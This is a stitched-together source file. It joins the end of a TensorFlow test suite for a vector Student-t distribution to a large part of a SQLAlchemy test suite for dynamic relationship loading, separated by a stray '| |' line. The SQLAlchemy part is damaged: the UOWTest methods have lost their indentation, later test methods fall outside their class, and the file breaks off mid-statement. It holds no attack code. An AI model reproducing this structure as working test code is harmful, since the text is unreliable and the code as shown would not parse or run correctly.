      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(),
                          rtol=0., atol=1e-5)

  def testProbDynamic(self):
    """Non-scalar batch with shapes fed at run time via placeholders."""
    # Non-scalar batch_shape.
    df = np.asarray([1., 2, 3], dtype=np.float32)
    # Non-scalar batch_shape.
    loc = np.asarray([[0., 0, 0],
                      [1, 2, 3],
                      [1, 0, 1]],
                     dtype=np.float32)
    scale_diag = np.asarray([[1., 2, 3],
                             [2, 3, 4],
                             [4, 5, 6]],
                            dtype=np.float32)
    scale_tril = np.concatenate([[np.diag(scale_diag[i])]
                                 for i in range(len(scale_diag))])
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=df, loc=loc, scale_tril=scale_tril)
    with self.cached_session():
      df_pl = array_ops.placeholder(dtypes.float32, name="df")
      loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
      scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
      feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
      # Fixed: build the distribution from the placeholders. Previously the
      # NumPy arrays were passed, so the placeholders and feed_dict were
      # dead code and dynamic shapes were never exercised.
      actual_mst = _VectorStudentT(df=df_pl, loc=loc_pl,
                                   scale_diag=scale_diag_pl,
                                   validate_args=True)
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)

  def testProbScalarBaseDistributionNonScalarTransform(self):
    """Scalar df broadcast against a batched affine transform."""
    # Scalar batch_shape.
    df = np.asarray(2., dtype=np.float32)
    # Non-scalar batch_shape.
    loc = np.asarray([[0., 0, 0],
                      [1, 2, 3],
                      [1, 0, 1]],
                     dtype=np.float32)
    scale_diag = np.asarray([[1., 2, 3],
                             [2, 3, 4],
                             [4, 5, 6]],
                            dtype=np.float32)
    scale_tril = np.concatenate([[np.diag(scale_diag[i])]
                                 for i in range(len(scale_diag))])
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=np.tile(df, reps=len(scale_diag)),
        loc=loc,
        scale_tril=scale_tril)
    with self.cached_session():
      actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
                                   validate_args=True)
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(),
                          rtol=0., atol=1e-5)

  def testProbScalarBaseDistributionNonScalarTransformDynamic(self):
    """Scalar df, batched transform, shapes fed at run time."""
    # Scalar batch_shape.
    df = np.asarray(2., dtype=np.float32)
    # Non-scalar batch_shape.
    loc = np.asarray([[0., 0, 0],
                      [1, 2, 3],
                      [1, 0, 1]],
                     dtype=np.float32)
    scale_diag = np.asarray([[1., 2, 3],
                             [2, 3, 4],
                             [4, 5, 6]],
                            dtype=np.float32)
    scale_tril = np.concatenate([[np.diag(scale_diag[i])]
                                 for i in range(len(scale_diag))])
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=np.tile(df, reps=len(scale_diag)),
        loc=loc,
        scale_tril=scale_tril)
    with self.cached_session():
      df_pl = array_ops.placeholder(dtypes.float32, name="df")
      loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
      scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
      feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
      # Fixed: use the placeholders (see testProbDynamic).
      actual_mst = _VectorStudentT(df=df_pl, loc=loc_pl,
                                   scale_diag=scale_diag_pl,
                                   validate_args=True)
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)

  def testProbNonScalarBaseDistributionScalarTransform(self):
    """Batched df broadcast against a single affine transform."""
    # Non-scalar batch_shape.
    df = np.asarray([1., 2., 3.], dtype=np.float32)
    # Scalar batch_shape.
    loc = np.asarray([1, 2, 3], dtype=np.float32)
    scale_diag = np.asarray([2, 3, 4], dtype=np.float32)
    scale_tril = np.diag(scale_diag)
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=df,
        loc=np.tile(loc[array_ops.newaxis, :], reps=[len(df), 1]),
        scale_tril=np.tile(scale_tril[array_ops.newaxis, :, :],
                           reps=[len(df), 1, 1]))
    with self.cached_session():
      actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
                                   validate_args=True)
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(),
                          rtol=0., atol=1e-5)

  def testProbNonScalarBaseDistributionScalarTransformDynamic(self):
    """Batched df, single transform, shapes fed at run time."""
    # Non-scalar batch_shape.
    df = np.asarray([1., 2., 3.], dtype=np.float32)
    # Scalar batch_shape.
    loc = np.asarray([1, 2, 3], dtype=np.float32)
    scale_diag = np.asarray([2, 3, 4], dtype=np.float32)
    scale_tril = np.diag(scale_diag)
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=df,
        loc=np.tile(loc[array_ops.newaxis, :], reps=[len(df), 1]),
        scale_tril=np.tile(scale_tril[array_ops.newaxis, :, :],
                           reps=[len(df), 1, 1]))
    with self.cached_session():
      df_pl = array_ops.placeholder(dtypes.float32, name="df")
      loc_pl = array_ops.placeholder(dtypes.float32, name="loc")
      scale_diag_pl = array_ops.placeholder(dtypes.float32, name="scale_diag")
      feed_dict = {df_pl: df, loc_pl: loc, scale_diag_pl: scale_diag}
      # Fixed: use the placeholders (see testProbDynamic).
      actual_mst = _VectorStudentT(df=df_pl, loc=loc_pl,
                                   scale_diag=scale_diag_pl,
                                   validate_args=True)
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(feed_dict=feed_dict),
                          rtol=0., atol=1e-5)
if __name__ == "__main__":
  # Run the test suite when executed directly.
  test.main()
| |
from sqlalchemy import testing, desc, select, func, exc, cast, Integer
from sqlalchemy.orm import (
mapper, relationship, create_session, Query, attributes, exc as orm_exc,
Session, backref, configure_mappers)
from sqlalchemy.orm.dynamic import AppenderMixin
from sqlalchemy.testing import (
AssertsCompiledSQL, assert_raises_message, assert_raises, eq_, is_)
from test.orm import _fixtures
from sqlalchemy.testing.assertsql import CompiledSQL
class _DynamicFixture(object):
    """Mixin supplying mapper fixtures with lazy="dynamic" relationships."""

    def _user_address_fixture(self, addresses_args=None):
        """Map User/Address with a dynamic ``addresses`` relationship.

        :param addresses_args: extra keyword arguments forwarded to
            :func:`relationship`.
        """
        # Fixed: use a None sentinel instead of a mutable {} default.
        addresses_args = addresses_args or {}
        users, Address, addresses, User = (self.tables.users,
                                           self.classes.Address,
                                           self.tables.addresses,
                                           self.classes.User)
        mapper(
            User, users, properties={
                'addresses': relationship(
                    Address, lazy="dynamic", **addresses_args)})
        mapper(Address, addresses)
        return User, Address

    def _order_item_fixture(self, items_args=None):
        """Map Order/Item (many-to-many) with a dynamic ``items`` relationship.

        :param items_args: extra keyword arguments forwarded to
            :func:`relationship`.
        """
        # Fixed: use a None sentinel instead of a mutable {} default.
        items_args = items_args or {}
        items, Order, orders, order_items, Item = (self.tables.items,
                                                   self.classes.Order,
                                                   self.tables.orders,
                                                   self.tables.order_items,
                                                   self.classes.Item)
        mapper(
            Order, orders, properties={
                'items': relationship(
                    Item, secondary=order_items, lazy="dynamic",
                    **items_args)})
        mapper(Item, items)
        return Order, Item
class DynamicTest(_DynamicFixture, _fixtures.FixtureTest, AssertsCompiledSQL):
    """Tests for query-producing lazy="dynamic" relationship collections."""

    def test_basic(self):
        User, Address = self._user_address_fixture()
        sess = create_session()
        q = sess.query(User)
        eq_([User(id=7,
                  addresses=[Address(id=1, email_address='jack@bean.com')])],
            q.filter(User.id == 7).all())
        eq_(self.static.user_address_result, q.all())

    def test_statement(self):
        """test that the .statement accessor returns the actual statement that
        would render, without any _clones called."""
        User, Address = self._user_address_fixture()
        sess = create_session()
        q = sess.query(User)
        u = q.filter(User.id == 7).first()
        self.assert_compile(
            u.addresses.statement,
            "SELECT addresses.id, addresses.user_id, addresses.email_address "
            "FROM "
            "addresses WHERE :param_1 = addresses.user_id",
            use_default_dialect=True
        )

    def test_detached_raise(self):
        # Using the dynamic collection on an expunged instance must raise.
        User, Address = self._user_address_fixture()
        sess = create_session()
        u = sess.query(User).get(8)
        sess.expunge(u)
        assert_raises(
            orm_exc.DetachedInstanceError,
            u.addresses.filter_by,
            email_address='e'
        )

    def test_no_uselist_false(self):
        # 'dynamic' is incompatible with uselist=False.
        User, Address = self._user_address_fixture(
            addresses_args={"uselist": False})
        assert_raises_message(
            exc.InvalidRequestError,
            "On relationship User.addresses, 'dynamic' loaders cannot be "
            "used with many-to-one/one-to-one relationships and/or "
            "uselist=False.",
            configure_mappers
        )

    def test_no_m2o(self):
        # 'dynamic' is incompatible with many-to-one relationships.
        users, Address, addresses, User = (self.tables.users,
                                           self.classes.Address,
                                           self.tables.addresses,
                                           self.classes.User)
        mapper(
            Address, addresses, properties={
                'user': relationship(User, lazy='dynamic')})
        mapper(User, users)
        assert_raises_message(
            exc.InvalidRequestError,
            "On relationship Address.user, 'dynamic' loaders cannot be "
            "used with many-to-one/one-to-one relationships and/or "
            "uselist=False.",
            configure_mappers
        )

    def test_order_by(self):
        User, Address = self._user_address_fixture()
        sess = create_session()
        u = sess.query(User).get(8)
        eq_(
            list(u.addresses.order_by(desc(Address.email_address))),
            [
                Address(email_address='ed@wood.com'),
                Address(email_address='ed@lala.com'),
                Address(email_address='ed@bettyboop.com')
            ]
        )

    def test_configured_order_by(self):
        addresses = self.tables.addresses
        User, Address = self._user_address_fixture(
            addresses_args={"order_by": addresses.c.email_address.desc()})
        sess = create_session()
        u = sess.query(User).get(8)
        eq_(
            list(u.addresses),
            [
                Address(email_address='ed@wood.com'),
                Address(email_address='ed@lala.com'),
                Address(email_address='ed@bettyboop.com')
            ]
        )
        # test cancellation of None, replacement with something else
        eq_(
            list(u.addresses.order_by(None).order_by(Address.email_address)),
            [
                Address(email_address='ed@bettyboop.com'),
                Address(email_address='ed@lala.com'),
                Address(email_address='ed@wood.com')
            ]
        )
        # test cancellation of None, replacement with nothing
        eq_(
            set(u.addresses.order_by(None)),
            set([
                Address(email_address='ed@bettyboop.com'),
                Address(email_address='ed@lala.com'),
                Address(email_address='ed@wood.com')
            ])
        )

    def test_count(self):
        User, Address = self._user_address_fixture()
        sess = create_session()
        u = sess.query(User).first()
        eq_(u.addresses.count(), 1)

    def test_dynamic_on_backref(self):
        users, Address, addresses, User = (self.tables.users,
                                           self.classes.Address,
                                           self.tables.addresses,
                                           self.classes.User)
        mapper(Address, addresses, properties={
            'user': relationship(User,
                                 backref=backref('addresses', lazy='dynamic'))
        })
        mapper(User, users)
        sess = create_session()
        ad = sess.query(Address).get(1)

        # Clearing the m2o must not trigger a load of the dynamic backref.
        def go():
            ad.user = None
        self.assert_sql_count(testing.db, go, 0)
        sess.flush()
        u = sess.query(User).get(7)
        assert ad not in u.addresses

    def test_no_count(self):
        User, Address = self._user_address_fixture()
        sess = create_session()
        q = sess.query(User)

        # dynamic collection cannot implement __len__() (at least one that
        # returns a live database result), else additional count() queries are
        # issued when evaluating in a list context
        def go():
            eq_(
                q.filter(User.id == 7).all(),
                [
                    User(
                        id=7, addresses=[
                            Address(id=1, email_address='jack@bean.com')])])
        self.assert_sql_count(testing.db, go, 2)

    def test_no_populate(self):
        User, Address = self._user_address_fixture()
        u1 = User()
        assert_raises_message(
            NotImplementedError,
            "Dynamic attributes don't support collection population.",
            attributes.set_committed_value, u1, 'addresses', []
        )

    def test_m2m(self):
        Order, Item = self._order_item_fixture(
            items_args={"backref": backref("orders", lazy="dynamic")})
        sess = create_session()
        o1 = Order(id=15, description="order 10")
        i1 = Item(id=10, description="item 8")
        o1.items.append(i1)
        sess.add(o1)
        sess.flush()
        assert o1 in i1.orders.all()
        assert i1 in o1.items.all()

    @testing.exclude(
        'mysql', 'between', ((5, 1, 49), (5, 1, 52)),
        'https://bugs.launchpad.net/ubuntu/+source/mysql-5.1/+bug/706988')
    def test_association_nonaliased(self):
        items, Order, orders, order_items, Item = (self.tables.items,
                                                   self.classes.Order,
                                                   self.tables.orders,
                                                   self.tables.order_items,
                                                   self.classes.Item)
        mapper(Order, orders, properties={
            'items': relationship(Item,
                                  secondary=order_items,
                                  lazy="dynamic",
                                  order_by=order_items.c.item_id)
        })
        mapper(Item, items)
        sess = create_session()
        o = sess.query(Order).first()
        self.assert_compile(
            o.items,
            "SELECT items.id AS items_id, items.description AS "
            "items_description FROM items,"
            " order_items WHERE :param_1 = order_items.order_id AND "
            "items.id = order_items.item_id"
            " ORDER BY order_items.item_id",
            use_default_dialect=True
        )
        # filter criterion against the secondary table
        # works
        eq_(
            o.items.filter(order_items.c.item_id == 2).all(),
            [Item(id=2)]
        )

    def test_transient_count(self):
        # Pending (unflushed) appends are visible to count().
        User, Address = self._user_address_fixture()
        u1 = User()
        u1.addresses.append(Address())
        eq_(u1.addresses.count(), 1)

    def test_transient_access(self):
        # Pending appends are visible via indexed access.
        User, Address = self._user_address_fixture()
        u1 = User()
        u1.addresses.append(Address())
        eq_(u1.addresses[0], Address())

    def test_custom_query(self):
        class MyQuery(Query):
            pass
        User, Address = self._user_address_fixture(
            addresses_args={"query_class": MyQuery})
        sess = create_session()
        u = User()
        sess.add(u)
        # The collection is an appender subclass of the custom query class.
        col = u.addresses
        assert isinstance(col, Query)
        assert isinstance(col, MyQuery)
        assert hasattr(col, 'append')
        eq_(type(col).__name__, 'AppenderMyQuery')
        # Derived queries lose the appender behavior.
        q = col.limit(1)
        assert isinstance(q, Query)
        assert isinstance(q, MyQuery)
        assert not hasattr(q, 'append')
        eq_(type(q).__name__, 'MyQuery')

    def test_custom_query_with_custom_mixin(self):
        class MyAppenderMixin(AppenderMixin):
            def add(self, items):
                if isinstance(items, list):
                    for item in items:
                        self.append(item)
                else:
                    self.append(items)

        class MyQuery(Query):
            pass

        class MyAppenderQuery(MyAppenderMixin, MyQuery):
            query_class = MyQuery
        User, Address = self._user_address_fixture(
            addresses_args={"query_class": MyAppenderQuery})
        sess = create_session()
        u = User()
        sess.add(u)
        # The explicitly provided appender class is used directly.
        col = u.addresses
        assert isinstance(col, Query)
        assert isinstance(col, MyQuery)
        assert hasattr(col, 'append')
        assert hasattr(col, 'add')
        eq_(type(col).__name__, 'MyAppenderQuery')
        # Derived queries lose both appender and custom mixin behavior.
        q = col.limit(1)
        assert isinstance(q, Query)
        assert isinstance(q, MyQuery)
        assert not hasattr(q, 'append')
        assert not hasattr(q, 'add')
        eq_(type(q).__name__, 'MyQuery')
class UOWTest(
_DynamicFixture, _fixtures.FixtureTest,
testing.AssertsExecutionResults):
run_inserts = None
def test_persistence(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture()
sess = create_session()
u1 = User(name='jack')
a1 = Address(email_address='foo')
sess.add_all([u1, a1])
sess.flush()
eq_(
testing.db.scalar(
select(
[func.count(cast(1, Integer))]).
where(addresses.c.user_id != None)),
0)
u1 = sess.query(User).get(u1.id)
u1.addresses.append(a1)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a1.id, u1.id, 'foo')]
)
u1.addresses.remove(a1)
sess.flush()
eq_(
testing.db.scalar(
select(
[func.count(cast(1, Integer))]).
where(addresses.c.user_id != None)),
0
)
u1.addresses.append(a1)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a1.id, u1.id, 'foo')]
)
a2 = Address(email_address='bar')
u1.addresses.remove(a1)
u1.addresses.append(a2)
sess.flush()
eq_(
testing.db.execute(
select([addresses]).where(addresses.c.user_id != None)
).fetchall(),
[(a2.id, u1.id, 'bar')]
)
def test_merge(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={"order_by": addresses.c.email_address})
sess = create_session()
u1 = User(name='jack')
a1 = Address(email_address='a1')
a2 = Address(email_address='a2')
a3 = Address(email_address='a3')
u1.addresses.append(a2)
u1.addresses.append(a3)
sess.add_all([u1, a1])
sess.flush()
u1 = User(id=u1.id, name='jack')
u1.addresses.append(a1)
u1.addresses.append(a3)
u1 = sess.merge(u1)
eq_(attributes.get_history(u1, 'addresses'), (
[a1],
[a3],
[a2]
))
sess.flush()
eq_(
list(u1.addresses),
[a1, a3]
)
def test_hasattr(self):
User, Address = self._user_address_fixture()
u1 = User(name='jack')
assert 'addresses' not in u1.__dict__
u1.addresses = [Address(email_address='test')]
assert 'addresses' in u1.__dict__
def test_collection_set(self):
addresses = self.tables.addresses
User, Address = self._user_address_fixture(
addresses_args={"order_by": addresses.c.email_address})
sess = create_session(autoflush=True, autocommit=False)
u1 = User(name='jack')
a1 = Address(email_address='a1')
a2 = Address(email_address='a2')
a3 = Address(email_address='a3')
a4 = Address(email_address='a4')
sess.add(u1)
u1.addresses = [a1, a3]
eq_(list(u1.addresses), [a1, a3])
u1.addresses = [a1, a2, a4]
eq_(list(u1.addresses), [a1, a2, a4])
u1.addresses = [a2, a3]
eq_(list(u1.addresses), [a2, a3])
u1.addresses = []
eq_(list(u1.addresses), [])
def test_noload_append(self):
# test that a load of User.addresses is not emitted
# when flushing an append
User, Address = self._user_address_fixture()
sess = Session()
u1 = User(name="jack", addresses=[Address(email_address="a1")])
sess.add(u1)
sess.commit()
u1_id = u1.id
sess.expire_all()
u1.addresses.append(Address(email_address='a2'))
self.assert_sql_execution(
testing.db,
sess.flush,
CompiledSQL(
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users WHERE users.id = :param_1",
lambda ctx: [{"param_1": u1_id}]),
CompiledSQL(
"INSERT INTO addresses (user_id, email_address) "
"VALUES (:user_id, :email_address)",
lambda ctx: [{'email_address': 'a2', 'user_id': u1_id}]
)
)
def test_noload_remove(self):
# test that a load of User.addresses is not emitted
# when flushing a remove
User, Address = self._user_address_fixture()
sess = Session()
u1 = User(name="jack", addresses=[Address(email_address="a1")])
a2 = Address(email_address='a2')
u1.addresses.append(a2)
sess.add(u1)
sess.commit()
u1_id = u1.id
a2_id = a2.id
sess.expire_all()
u1.addresses.remove(a2)
self.assert_sql_execution(
testing.db,
sess.flush,
CompiledSQL(
"SELECT addresses.id AS addresses_id, addresses.email_address "
"AS addresses_email_address FROM addresses "
"WHERE addresses.id = :param_1",
lambda ctx: [{'param_1': a2_id}]
),
CompiledSQL(
"UPDATE addresses SET user_id=:user_id WHERE addresses.id = "
":addresses_id",
lambda ctx: [{'addresses_id': a2_id, 'user_id': None}]
),
CompiledSQL(
"SELECT users.id AS users_id, users.name AS users_name "
"FROM users WHERE users.id = :param_1",
lambda ctx: [{"param_1": u1_id}]),
)
def test_rollback(self):
    """Rolling the session back undoes uncommitted dynamic-collection changes."""
    User, Address = self._user_address_fixture()
    sess = create_session(
        expire_on_commit=False, autocommit=False, autoflush=True)
    user = User(name='jack')
    user.addresses.append(Address(email_address='lala@hoho.com'))
    sess.add(user)
    sess.flush()
    sess.commit()
    # A pending, uncommitted append...
    user.addresses.append(Address(email_address='foo@bar.com'))
    expected_both = [
        Address(email_address='lala@hoho.com'),
        Address(email_address='foo@bar.com'),
    ]
    eq_(user.addresses.order_by(Address.id).all(), expected_both)
    sess.rollback()
    # ...is gone after the rollback; only the committed row remains.
    eq_(user.addresses.all(), [Address(email_address='lala@hoho.com')])
def _test_delete_cascade(self, expected):
    # Shared body for the two delete-cascade tests below.  `expected` is
    # True when the "save-update" cascade is configured (addresses are
    # expected to survive the User delete, de-associated), and False for
    # "all, delete" (addresses are expected to be deleted with the User).
    addresses = self.tables.addresses
    User, Address = self._user_address_fixture(
        addresses_args={
            "order_by": addresses.c.id,
            "backref": "user",
            "cascade": "save-update" if expected else "all, delete"})
    sess = create_session(autoflush=True, autocommit=False)
    u = User(name='ed')
    u.addresses.extend(
        [Address(email_address=letter) for letter in 'abcdef']
    )
    sess.add(u)
    sess.commit()
    # Precondition: all six addresses are associated with the user.
    # NOTE(review): `addresses.count(...)` is the legacy SQLAlchemy
    # select-count API -- confirm it matches the SQLAlchemy version in use.
    eq_(testing.db.scalar(addresses.count(addresses.c.user_id == None)), 0)
    eq_(testing.db.scalar(addresses.count(addresses.c.user_id != None)), 6)
    sess.delete(u)
    sess.commit()
    if expected:
        # "save-update": rows survive with user_id NULLed out.
        eq_(
            testing.db.scalar(
                addresses.count(addresses.c.user_id == None)), 6)
        eq_(
            testing.db.scalar(
                addresses.count(addresses.c.user_id != None)), 0)
    else:
        # "all, delete": the rows are deleted entirely.
        eq_(testing.db.scalar(addresses.count()), 0)
def test_delete_nocascade(self):
    # "save-update" cascade: deleting the User leaves the addresses
    # behind with user_id NULLed out.
    self._test_delete_cascade(True)

def test_delete_cascade(self):
    # "all, delete" cascade: deleting the User deletes the addresses too.
    self._test_delete_cascade(False)
def test_self_referential(self):
    """A dynamic relationship also works on a self-referential mapping."""
    Node, nodes = self.classes.Node, self.tables.nodes
    mapper(Node, nodes, properties={
        'children': relationship(
            Node, lazy="dynamic", order_by=nodes.c.id)})
    sess = Session()
    child_a, child_b = Node(), Node()
    parent = Node(children=[child_a, child_b])
    sess.add(parent)
    sess.commit()
    # The dynamic query returns the children in id order.
    eq_(parent.children.all(), [child_a, child_b])
def test_remove_orphans(self):
    # With "all, delete-orphan", removing an Address from the dynamic
    # collection deletes the orphaned row on flush.
    addresses = self.tables.addresses
    User, Address = self._user_address_fixture(
        addresses_args={
            "order_by": addresses.c.id,
            "backref": "user",
            "cascade": "all, delete-orphan"})
    sess = create_session(autoflush=True, autocommit=False)
    u = User(name='ed')
    u.addresses.extend(
        [Address(email_address=letter) for letter in 'abcdef']
    )
    sess.add(u)
    for a in u.addresses.filter(
            Address.email_address.in_(['c', 'e', 'f'])):
        u.addresses.remove(a)
    # Only the three non-removed addresses remain; autoflush purges the
    # orphans when the query below executes.
    eq_(
        set(ad for ad, in sess.query(Address.email_address)),
        set(['a', 'b', 'd'])
    )
def _backref_test(self, autoflush, saveuser):
    # Shared body for the four test_backref_* variants below: associate
    # via the backref scalar (a.user = u), save either side, then clear
    # the backref and check that the dynamic collection tracks each step.
    User, Address = self._user_address_fixture(
        addresses_args={"backref": "user"})
    sess = create_session(autoflush=autoflush, autocommit=False)
    u = User(name='buffy')
    a = Address(email_address='foo@bar.com')
    # Associate through the backref, not through the collection.
    a.user = u
    if saveuser:
        sess.add(u)
    else:
        sess.add(a)
    if not autoflush:
        sess.flush()
    assert u in sess
    assert a in sess
    eq_(list(u.addresses), [a])
    a.user = None
    if not autoflush:
        # Without autoflush the de-association is not yet visible via SQL.
        eq_(list(u.addresses), [a])
    if not autoflush:
        sess.flush()
    eq_(list(u.addresses), [])
def test_backref_autoflush_saveuser(self):
    # autoflush on, save the User side.
    self._backref_test(True, True)

def test_backref_autoflush_savead(self):
    # autoflush on, save the Address side.
    self._backref_test(True, False)

def test_backref_saveuser(self):
    # autoflush off, save the User side.
    self._backref_test(False, True)

def test_backref_savead(self):
    # autoflush off, save the Address side.
    self._backref_test(False, False)
def test_backref_events(self):
    """Appending via the dynamic collection populates the backref at once."""
    User, Address = self._user_address_fixture(
        addresses_args={"backref": "user"})
    user = User()
    address = Address()
    user.addresses.append(address)
    # The scalar side of the backref is set without any flush.
    is_(address.user, user)
def test_no_deref(self):
    # The dynamic collection should issue a fresh query per access rather
    # than holding on to a dereferenced/stale result, even across
    # separately created sessions.
    User, Address = self._user_address_fixture(
        addresses_args={"backref": "user", })
    session = create_session()
    user = User()
    user.name = 'joe'
    user.fullname = 'Joe User'
    user.password = 'Joe\'s secret'
    address = Address()
    address.email_address = 'joe@joesdomain.example'
    address.user = user
    session.add(user)
    session.flush()
    session.expunge_all()

    def query1():
        # Query through a brand-new session.
        session = create_session(testing.db)
        user = session.query(User).first()
        return user.addresses.all()

    def query2():
        session = create_session(testing.db)
        return session.query(User).first().addresses.all()

    def query3():
        # Identical to query2 on purpose: checks a repeated access.
        session = create_session(testing.db)
        return session.query(User).first().addresses.all()
    eq_(query1(), [Address(email_address='joe@joesdomain.example')])
    eq_(query2(), [Address(email_address='joe@joesdomain.example')])
    eq_(query3(), [Address(email_address='joe@joesdomain.example')])
class HistoryTest(_DynamicFixture, _fixtures.FixtureTest):
    """Attribute-history tests for dynamic relationship collections.

    Each `compare` argument passed to _assert_history is the expected
    (added, unchanged, deleted) triple returned by
    `attributes.get_history()`.
    """
    # Do not run the standard fixture inserts for these tests.
    run_inserts = None

    def _transient_fixture(self, addresses_args={}):
        # Returns a transient User and Address pair.
        # NOTE(review): mutable default argument; it appears to be only
        # forwarded to the fixture factory -- confirm it is never mutated.
        User, Address = self._user_address_fixture(
            addresses_args=addresses_args)
        u1 = User()
        a1 = Address()
        return u1, a1

    def _persistent_fixture(self, autoflush=True, addresses_args={}):
        # Returns a flushed (persistent) User, a transient Address, and
        # the session used.
        User, Address = self._user_address_fixture(
            addresses_args=addresses_args)
        u1 = User(name='u1')
        a1 = Address(email_address='a1')
        s = Session(autoflush=autoflush)
        s.add(u1)
        s.flush()
        return u1, a1, s

    def _persistent_m2m_fixture(self, autoflush=True, items_args={}):
        # Many-to-many analogue of _persistent_fixture (Order <-> Item).
        Order, Item = self._order_item_fixture(items_args=items_args)
        o1 = Order()
        i1 = Item(description="i1")
        s = Session(autoflush=autoflush)
        s.add(o1)
        s.flush()
        return o1, i1, s

    def _assert_history(self, obj, compare, compare_passive=None):
        # Compares get_history() against `compare`, and the
        # LOAD_AGAINST_COMMITTED variant against `compare_passive`
        # (which defaults to `compare`).
        # NOTE(review): no else branch -- an unexpected obj type would
        # leave `attrname` unbound and raise NameError.
        if isinstance(obj, self.classes.User):
            attrname = "addresses"
        elif isinstance(obj, self.classes.Order):
            attrname = "items"
        eq_(
            attributes.get_history(obj, attrname),
            compare
        )
        if compare_passive is None:
            compare_passive = compare
        eq_(
            attributes.get_history(obj, attrname,
                                   attributes.LOAD_AGAINST_COMMITTED),
            compare_passive
        )

    def test_append_transient(self):
        u1, a1 = self._transient_fixture()
        u1.addresses.append(a1)
        self._assert_history(u1,
                             ([a1], [], [])
                             )

    def test_append_persistent(self):
        u1, a1, s = self._persistent_fixture()
        u1.addresses.append(a1)
        self._assert_history(u1,
                             ([a1], [], [])
                             )

    def test_remove_transient(self):
        u1, a1 = self._transient_fixture()
        u1.addresses.append(a1)
        u1.addresses.remove(a1)
        self._assert_history(u1,
                             ([], [], [])
                             )

    def test_backref_pop_transient(self):
        u1, a1 = self._transient_fixture(addresses_args={"backref": "user"})
        u1.addresses.append(a1)
        self._assert_history(u1,
                             ([a1], [], []),
                             )
        a1.user = None
        # removed from added
        self._assert_history(u1,
                             ([], [], []),
                             )

    def test_remove_persistent(self):
        u1, a1, s = self._persistent_fixture()
        u1.addresses.append(a1)
        s.flush()
        s.expire_all()
        u1.addresses.remove(a1)
        self._assert_history(u1,
                             ([], [], [a1])
                             )

    def test_backref_pop_persistent_autoflush_o2m_active_hist(self):
        u1, a1, s = self._persistent_fixture(
            addresses_args={"backref": backref("user", active_history=True)})
        u1.addresses.append(a1)
        s.flush()
        s.expire_all()
        a1.user = None
        self._assert_history(u1,
                             ([], [], [a1]),
                             )

    def test_backref_pop_persistent_autoflush_m2m(self):
        o1, i1, s = self._persistent_m2m_fixture(
            items_args={"backref": "orders"})
        o1.items.append(i1)
        s.flush()
        s.expire_all()
        i1.orders.remove(o1)
        self._assert_history(o1,
                             ([], [], [i1]),
                             )

    def test_backref_pop_persistent_noflush_m2m(self):
        o1, i1, s = self._persistent_m2m_fixture(
            items_args={"backref": "orders"}, autoflush=False)
        o1.items.append(i1)
        s.flush()
        s.expire_all()
        i1.orders.remove(o1)
        self._assert_history(o1,
                             ([], [], [i1]),
                             )

    def test_unchanged_persistent(self):
        Address = self.classes.Address
        u1, a1, s = self._persistent_fixture()
        a2, a3 = Address(email_address='a2'), Address(email_address='a3')
        u1.addresses.append(a1)
        u1.addresses.append(a2)
        s.flush()
        # After the flush, a1/a2 are committed; a3 is a new add and a2 a
        # new remove -- the passive variant does not report a1 as unchanged.
        u1.addresses.append(a3)
        u1.addresses.remove(a2)
        self._assert_history(u1,
                             ([a3], [a1], [a2]),
                             compare_passive=([a3], [], [a2])
                             )

    def test_replace_transient(self):
        Address = self.classes.Address
        u1, a1 = self._transient_fixture()
        a2, a3, a4, a5 = Address(email_address='a2'), \
            Address(email_address='a3'), Address(email_address='a4'), \
            Address(email_address='a5')
        u1.addresses = [a1, a2]
        u1.addresses = [a2, a3, a4, a5]
        # On a transient object only the final assignment counts as added.
        self._assert_history(u1,
                             ([a2, a3, a4, a5], [], [])
                             )

    def test_replace_persistent_noflush(self):
        Address = self.classes.Address
        u1, a1, s = self._persistent_fixture(autoflush=False)
        a2, a3, a4, a5 = Address(email_address='a2'), \
